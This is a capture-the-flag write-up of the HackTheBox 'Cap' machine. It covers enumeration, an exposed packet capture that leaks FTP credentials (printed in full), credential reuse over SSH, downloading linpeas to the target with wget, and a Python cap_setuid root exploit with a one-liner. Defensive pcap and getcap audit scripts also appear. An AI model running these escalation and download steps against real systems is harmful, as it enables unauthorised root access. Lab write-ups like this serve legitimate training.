Cap HackTheBox Writeup (Easy)
The box statistics are shown below.
Enumeration (NMAP)
Firstly, I ran an Nmap scan to identify open ports and to detect the services and versions running on them.
nmap -sC -sV 10.10.10.245
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-17 23:31 EDT
Nmap scan report for 10.10.10.245
Host is up (0.13s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http gunicorn
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| Server: gunicorn
| Date: Fri, 18 Jun 2021 03:43:59 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 232
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Fri, 18 Jun 2021 03:43:53 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 19386
| <!DOCTYPE html>
| <html class="no-js" lang="en">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Security Dashboard</title>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
| <link rel="stylesheet" href="/static/css/bootstrap.min.css">
| <link rel="stylesheet" href="/static/css/font-awesome.min.css">
| <link rel="stylesheet" href="/static/css/themify-icons.css">
| <link rel="stylesheet" href="/static/css/metisMenu.css">
| <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
| <link rel="stylesheet" href="/static/css/slicknav.min.css">
| <!-- amchar
| HTTPOptions:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Fri, 18 Jun 2021 03:43:53 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Allow: HEAD, GET, OPTIONS
| Content-Length: 0
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| Connection: close
| Content-Type: text/html
| Content-Length: 196
| <html>
| <head>
| <title>Bad Request</title>
| </head>
| <body>
| <h1><p>Bad Request</p></h1>
| Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''
| </body>
|_ </html>
|_http-server-header: gunicorn
|_http-title: Security Dashboard
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 137.03 seconds
Analysing the results above, we see three open ports and three running services:
- 21 = vsftpd 3.0.3
- 22 = OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
- 80 = gunicorn (HTTP)
If you're unaware of what "gunicorn" is, here is a brief explanation: Gunicorn ("Green Unicorn") is a Python WSGI (Web Server Gateway Interface) HTTP server.
Web App Enumeration
Heading over to the web application, we see a nice template provided by "Colorlib".
Let's try discovering files and directories with Gobuster. This can help us enumerate pages and functionality on the web app, or information that isn't supposed to be disclosed and can therefore lead to vulnerabilities, e.g. a web page that allows us to upload files but is still under construction.
gobuster dir -u http://10.10.10.245 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.245
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/06/17 23:56:46 Starting gobuster in directory enumeration mode
===============================================================
/data (Status: 302) [Size: 208] [--> http://10.10.10.245/]
/ip (Status: 200) [Size: 17466]
/netstat (Status: 200) [Size: 32292]
/capture (Status: 302) [Size: 222] [--> http://10.10.10.245/data/16]
Analysing the responses, we have two "302" status codes ("Found", i.e. a redirect) and two "200" status codes ("OK"). Let's check these out, starting with the following URL: 10.10.10.245/ip
This page seems to be displaying the equivalent of "ipconfig" for Windows users or "ifconfig" for Linux users: it shows the box's eth0 interface configuration, e.g. the "inet" address, so somehow this is posting information about the box, though whether it is live I am unsure. Let's check the source code for any kind of possible information disclosure or comments on this.
In the source code I see the following, which is how the "eth0" interface configuration is being displayed.
<pre>eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.245 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 fe80::250:56ff:feb9:9a6f prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:9a6f prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:9a:6f txqueuelen 1000 (Ethernet)
RX packets 2907275 bytes 373001526 (373.0 MB)
RX errors 0 dropped 290 overruns 0 frame 0
TX packets 3095798 bytes 675868558 (675.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 34789 bytes 2672084 (2.6 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 34789 bytes 2672084 (2.6 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0</pre>
Judging by the look of this I do not believe an API is being loaded, as the output is inside pre tags, but that doesn't mean there isn't an API endpoint somewhere; we can try checking the Network tab. But first, what are pre tags used for? Pre tags define a block of preformatted text that preserves line breaks, spaces, etc.
Checking the Network tab is pretty simple: press "F12", navigate to "Network", then press "F5" to refresh the page and analyse everything being loaded onto that page from the web server.
I do not see anything being loaded API-wise, so let's move on to the next thing, "/netstat". This sounds interesting, and I am wondering whether it is live or has just been copied and pasted. We will follow the same mindset: analyse the page and the contents being loaded, then view the source code again.
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State User Inode PID/Program name Timer
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 101 32358 - off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 0 33655 - off (0.00/0/0)
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1001 35841 - off (0.00/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35224 TIME_WAIT 0 0 - timewait (37.23/0/0)
tcp 0 166 10.10.10.245:80 10.10.14.19:35811 ESTABLISHED 1001 437271 - on (0.62/0/0)
tcp 0 166 10.10.10.245:80 10.10.14.19:33113 ESTABLISHED 1001 436671 - on (0.56/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:57691 TIME_WAIT 0 0 - timewait (18.69/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.16:57266 ESTABLISHED 1001 436729 - off (0.00/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35264 TIME_WAIT 0 0 - timewait (55.26/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35192 TIME_WAIT 0 0 - timewait (32.73/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35172 TIME_WAIT 0 0 - timewait (4.11/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35186 TIME_WAIT 0 0 - timewait (33.14/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35216 TIME_WAIT 0 0 - timewait (34.35/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35244 TIME_WAIT 0 0 - timewait (40.74/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35212 TIME_WAIT 0 0 - timewait (36.98/0/0)
tcp 0 166 10.10.10.245:80 10.10.14.19:46493 ESTABLISHED 1001 437275 - on (0.54/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:40887 TIME_WAIT 0 0 - timewait (44.16/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35198 TIME_WAIT 0 0 - timewait (31.82/0/0)
tcp 0 166 10.10.10.245:80 10.10.14.19:35577 ESTABLISHED 1001 437274 - on (0.62/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35196 TIME_WAIT 0 0 - timewait (32.60/0/0)
tcp 0 166 10.10.10.245:80 10.10.14.19:47709 ESTABLISHED 1001 437273 - on (0.40/0/0)
tcp 0 166 10.10.10.245:80 10.10.14.19:51535 ESTABLISHED 1001 436688 - on (0.49/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:53699 TIME_WAIT 0 0 - timewait (43.73/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:32991 TIME_WAIT 0 0 - timewait (18.79/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35246 TIME_WAIT 0 0 - timewait (43.95/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:38617 TIME_WAIT 0 0 - timewait (40.03/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35242 TIME_WAIT 0 0 - timewait (42.42/0/0)
tcp 0 0 10.10.10.245:22 10.10.14.124:35156 ESTABLISHED 0 37911 - keepalive (1276.17/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35170 TIME_WAIT 0 0 - timewait (0.00/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35222 TIME_WAIT 0 0 - timewait (39.52/0/0)
tcp 0 166 10.10.10.245:80 10.10.14.19:44185 ESTABLISHED 1001 436670 - on (0.48/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35204 TIME_WAIT 0 0 - timewait (33.14/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35194 TIME_WAIT 0 0 - timewait (32.73/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35188 TIME_WAIT 0 0 - timewait (32.79/0/0)
tcp 0 166 10.10.10.245:80 10.10.14.19:41435 ESTABLISHED 1001 437272 - on (0.49/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35190 TIME_WAIT 0 0 - timewait (32.73/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35206 TIME_WAIT 0 0 - timewait (31.89/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35210 TIME_WAIT 0 0 - timewait (42.56/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35228 TIME_WAIT 0 0 - timewait (46.46/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35256 TIME_WAIT 0 0 - timewait (48.67/0/0)
tcp 0 166 10.10.10.245:80 10.10.14.19:50513 ESTABLISHED 1001 437294 - on (0.51/0/0)
tcp 0 166 10.10.10.245:80 10.10.14.19:46967 ESTABLISHED 1001 437296 - on (0.54/0/0)
tcp6 0 0 :::21 :::* LISTEN 0 33290 - off (0.00/0/0)
tcp6 0 0 :::22 :::* LISTEN 0 33657 - off (0.00/0/0)
udp 0 0 127.0.0.53:53 0.0.0.0:* 101 31957 - off (0.00/0/0)
udp 0 0 10.10.10.245:60625 1.1.1.1:53 ESTABLISHED 101 433148 - off (0.00/0/0)
udp 0 0 127.0.0.1:37307 127.0.0.53:53 ESTABLISHED 102 437297 - off (0.00/0/0)
udp 0 0 10.10.10.245:55763 1.1.1.1:53 ESTABLISHED 101 433147 - off (0.00/0/0)
Active UNIX domain sockets (servers and established)
Once again it's inside pre tags, so I can only assume it has been copied and pasted onto the web page, but this still gives an overview of what is running on the box (connections, ports, sockets, etc.), and this information can help us map the machine.
Exploitation
Heading over to "/capture" we see the following in the URL: "/data/10".
This shows a preview of packets. In my case there is "0" for everything, so there is no traffic; I am going to try loading /capture once again to see if any traffic is being loaded. Interestingly, this time I see "/data/11". What if we change it to "/data/5"?
It displays packets, but in an exact form; this is weird and looks fake. Let's try viewing "1" or "0": "/data/0".
This shows a basic number of packets and their data types, e.g. "Number of Packets" "72" and so on. Let's download this "packet capture"; assuming it's a .pcap file, we can load it into Wireshark, which is a packet/traffic analyser.
Do the following to load the .pcap file into Wireshark and analyse the traffic.
- Search for "wireshark", or download and install it.
- Click "File" and then select "Open".
- Navigate over to the directory where the 0.pcap file is and click "Open".
If done correctly you'll see a lot of traffic. If this is your first time using Wireshark, do not panic: watch a video on Wireshark traffic analysis and then come back, or if you're interested in a brief overview, stay here.
As we can see above there is a basic layout, e.g. "Time, Source, Destination, Protocol, Length, Information". Source is the IP address the packet was sent from, Destination is usually the receiver, and Protocol is what they're using to communicate, e.g. "TCP, HTTP". Now, we saw there was "VSFTPD" on the machine; the issue with FTP/VSFTPD is that credentials are sent in plain text, so if we use Wireshark's "filter" option and look for FTP we may be able to gain a bit of information.
As you can see there is FTP traffic, meaning there are most likely some credentials. Analysing the traffic we can see "Nathan", which is a possible username; I confirmed this by double clicking on the request and clicking through "FTP".
We then see FTP asking for a password, which was sent in plain text.
"Buck3tH4TF0RM3!" is the FTP password! 1+1 = Username: nathan, Password: Buck3tH4TF0RM3! We can now log in with FTP.
We are now logged in, so we can start enumerating the box. The first thing I want to check is whether I can move directories: "cd /home" gave me a "directory successfully changed" message, meaning we can.
We also had SSH open on the default SSH port "22", so let's try authenticating with the same credentials.
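The check done above in Wireshark (filter on FTP, read the USER and PASS commands) is worth automating when auditing captures for credentials sent in the clear. The following is an added example, not code from the original post: a minimal classic-pcap parser (Ethernet/IPv4/TCP only, no pcapng) that reports logins sent to the FTP control port, run over a constructed in-memory capture with placeholder credentials.

```python
import struct
from typing import Iterator, List, Tuple

PCAP_MAGIC_LE, PCAP_MAGIC_BE, LINKTYPE_ETHERNET = 0xA1B2C3D4, 0xD4C3B2A1, 1


def _ipv4(addr: str) -> bytes:
    return bytes(int(octet) for octet in addr.split("."))


def build_tcp_frame(src: str, dst: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Constructed Ethernet/IPv4/TCP frame; checksums are left at zero, which the parser ignores."""
    eth = b"\x00" * 12 + b"\x08\x00"                                # zero MACs, EtherType IPv4
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload),   # version 4, IHL 5
                     0, 0, 64, 6, 0, _ipv4(src), _ipv4(dst))        # TTL 64, protocol 6 = TCP
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0)  # PSH|ACK
    return eth + ip + tcp + payload


def build_pcap(frames: List[bytes]) -> bytes:
    """Constructed classic libpcap file: 24-byte global header, then a 16-byte record header per frame."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1623900000 + i, 0, len(frame), len(frame)) + frame
    return out


def tcp_segments(pcap: bytes) -> Iterator[Tuple[str, str, int, int, bytes]]:
    """Yield (src_ip, dst_ip, sport, dport, payload) for each IPv4/TCP frame in a classic pcap."""
    magic, = struct.unpack_from("<I", pcap, 0)
    endian = {PCAP_MAGIC_LE: "<", PCAP_MAGIC_BE: ">"}.get(magic)
    if endian is None:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    if struct.unpack_from(endian + "I", pcap, 20)[0] != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled here")
    offset = 24
    while offset + 16 <= len(pcap):
        caplen = struct.unpack_from(endian + "IIII", pcap, offset)[2]
        frame = pcap[offset + 16: offset + 16 + caplen]
        offset += 16 + caplen
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue                                              # not IPv4 over Ethernet, or not TCP
        tcp_off = 14 + (frame[14] & 0x0F) * 4                     # 14-byte Ethernet header + IHL
        sport, dport = struct.unpack_from("!HH", frame, tcp_off)
        data_off = (frame[tcp_off + 12] >> 4) * 4
        src = ".".join(map(str, frame[26:30]))
        dst = ".".join(map(str, frame[30:34]))
        yield src, dst, sport, dport, frame[tcp_off + data_off:]


def find_cleartext_ftp_logins(pcap: bytes, ftp_port: int = 21) -> List[Tuple[str, str, str, str]]:
    """Return (client, server, user, password) for every USER/PASS pair sent to the FTP control port."""
    pending_user = {}           # (client, server) -> last USER seen on that control connection
    found = []
    for src, dst, _sport, dport, payload in tcp_segments(pcap):
        if dport != ftp_port or not payload:
            continue
        for line in payload.decode("ascii", errors="replace").splitlines():
            verb, _, arg = line.strip().partition(" ")
            if verb.upper() == "USER":
                pending_user[(src, dst)] = arg
            elif verb.upper() == "PASS" and (src, dst) in pending_user:
                found.append((src, dst, pending_user.pop((src, dst)), arg))
    return found


# Constructed sample capture with placeholder credentials: one FTP login, the server's 331 reply,
# and an unrelated HTTP request that the audit must ignore.
SAMPLE_PCAP = build_pcap([
    build_tcp_frame("192.0.2.10", "192.0.2.1", 40000, 21, b"USER alice\r\n"),
    build_tcp_frame("192.0.2.1", "192.0.2.10", 21, 40000, b"331 Please specify the password.\r\n"),
    build_tcp_frame("192.0.2.10", "192.0.2.1", 40000, 21, b"PASS example-only-pw\r\n"),
    build_tcp_frame("192.0.2.10", "192.0.2.1", 40001, 80, b"GET / HTTP/1.0\r\n\r\n"),
])

if __name__ == "__main__":
    for client, server, user, password in find_cleartext_ftp_logins(SAMPLE_PCAP):
        print(f"cleartext FTP login {client} -> {server}: user={user!r}, password length {len(password)}")
```

To run it against a real file such as 0.pcap, pass `open("0.pcap", "rb").read()` to find_cleartext_ftp_logins instead of SAMPLE_PCAP.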
Priv Esc
Now that we are on the box as "Nathan" we need to get root. I am going to run linpeas, which is a popular tool for identifying ways to priv esc and spotting things that are a potential risk, e.g. it will check for binaries, cron jobs, permissions, etc.
Assuming you've got linpeas on your box, we will use the following commands to transfer it to Nathan's box using the web server built into Python 3 (the first command runs on your machine, the second on the target):
python3 -m http.server
wget http://$IP:8000/linpeas.sh
Make sure you have "linpeas.sh" in your working directory, e.g. /opt/HTB/linpeas.sh, and then start the web server from that directory (/opt/HTB).
Now we need to give linpeas executable permissions; run the following command as the Nathan user so that linpeas can be executed.
chmod +x linpeas.sh
Now run "linpeas.sh", and please do not get overwhelmed if this is your first time viewing its output.
There is a lot of information; if you are unsure about 90% of it, please just do some research, e.g. "Checking for crontabs": if you are unaware of what a crontab is, Google it.
Also keep an eye on the color output as shown below.
linpeas v3.2.5 by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Going through the linpeas output we see "Files with capabilities (limited to 50):", and Python3 is listed under that category.
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
The binary is owned by root. We should also note the "cap_setuid" capability: the Python os module has functions that get the user's UID, set a UID and a lot more, and I believe that because of "cap_setuid" we can change our UID.
The plan is that if we can change our UID we can set it to "0", which is root.
I wrote a script that will try setting the UID you pass in, e.g. "0"; if it can set the UID it will spawn a bash shell with that UID, otherwise it will print an error. So if you come across a CTF where python3 has the capability to set your UID you can use this, or simply use a one-liner, which I will also show.
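From the defending side, the "Files with capabilities" list above is exactly what a host audit should parse. The following is an added example, not linpeas code or anything from the original post: it reads getcap-style lines (both the older "path = caps+flags" layout shown above and the newer "path caps=flags" layout), resolves the effective/inheritable/permitted flags, and reports entries where an identity-changing or DAC-bypassing capability is effective or permitted, with interpreters like python3 called out. The set of capabilities treated as dangerous is this example's own choice.

```python
import re
from typing import Dict, Iterable, List, Set, Tuple

# Capabilities that let a process change identity, bypass DAC or load code into the kernel.
# This list is the example's own choice of "review these", not something linpeas defines.
PRIVESC_CAPS = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override", "cap_dac_read_search",
    "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner",
}

# Interpreters and debuggers: with cap_setuid these become "become root on demand" tools.
INTERPRETERS = re.compile(r"/(python[\d.]*|perl[\d.]*|ruby[\d.]*|php[\d.]*|node|gdb|vim|bash|sh)$")

# Accepts both the older "path = caps+flags" and the newer "path caps=flags" getcap layouts.
CAP_LINE = re.compile(r"^\s*(?P<path>/\S+)\s*=?\s*(?P<spec>\S+)\s*$")
CLAUSE = re.compile(r"^([a-z0-9_,]+)([+=-])([eip]*)$")


def parse_cap_spec(spec: str) -> Dict[str, Set[str]]:
    """Parse a libcap text spec such as 'cap_setuid,cap_net_bind_service+eip'.

    Returns {capability: set of flags}, where e = effective, i = inheritable, p = permitted.
    Space-separated clauses are applied left to right; '=' replaces, '+' adds, '-' removes.
    """
    caps: Dict[str, Set[str]] = {}
    for clause in spec.split():
        m = CLAUSE.match(clause)
        if not m:
            raise ValueError(f"unrecognised capability clause: {clause!r}")
        names, action, flags = m.groups()
        for name in names.split(","):
            current = caps.setdefault(name, set())
            if action == "=":
                current.clear()
            if action == "-":
                current.difference_update(flags)
            else:
                current.update(flags)
    return caps


def audit_getcap(lines: Iterable[str]) -> List[Tuple[str, str, str]]:
    """Return (path, capability, note) for every entry that deserves a privilege-escalation review.

    Only the effective (e) and permitted (p) sets matter here: an inheritable-only capability
    is not gained just by executing the file.
    """
    findings = []
    for line in lines:
        m = CAP_LINE.match(line)
        if not m:
            continue
        path = m.group("path")
        for cap, flags in parse_cap_spec(m.group("spec")).items():
            if cap not in PRIVESC_CAPS or not (flags & {"e", "p"}):
                continue
            note = ("identity-changing capability on an interpreter" if INTERPRETERS.search(path)
                    else "dangerous capability, check what the binary does with it")
            findings.append((path, cap, note))
    return findings


# Sample input: the five lines linpeas reported on this box, plus two constructed lines showing
# the inheritable-only case and the newer getcap output layout.
SAMPLE_GETCAP = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/opt/example/helper = cap_dac_override+i
/usr/bin/perl cap_setuid=ep
""".splitlines()

if __name__ == "__main__":
    for path, cap, note in audit_getcap(SAMPLE_GETCAP):
        print(f"{path}: {cap} ({note})")
```

On a live host, feed it the output of `getcap -r / 2>/dev/null` instead of SAMPLE_GETCAP; the fix for the finding on this box is removing cap_setuid from the interpreter (setcap -r) rather than relying on file ownership.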
import os

# Show the current (real) UID before attempting to change it
uid = os.getuid()
print("Your current SUID is:", uid)

# Ask which UID to switch to, e.g. 0 for root
setuid = int(input("Enter an SUID: "))
print("Attempting to set UID")
try:
    # Only succeeds if the interpreter has cap_setuid (or is already root)
    os.setuid(setuid)
    print("Success")
    # Spawn a shell that runs with the new UID
    os.system("/bin/bash")
except OSError as err:
    print("An error occurred, sorry:", err)
Breaking this down: we import the "os" module and set a variable called "uid" that holds the current UID, then print "Your current SUID is" followed by that variable.
It then creates another variable called "setuid" that takes as input the UID you want to set, and prints "Attempting to set UID". It then tries to set the UID to the user's input; on success it prints "Success" and spawns a /bin/bash shell, and if it cannot set that UID it prints that an error occurred.
I am now root! The one-liner is simply:
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
I hope you enjoyed this detailed writeup.
A Twitter follow is always appreciated.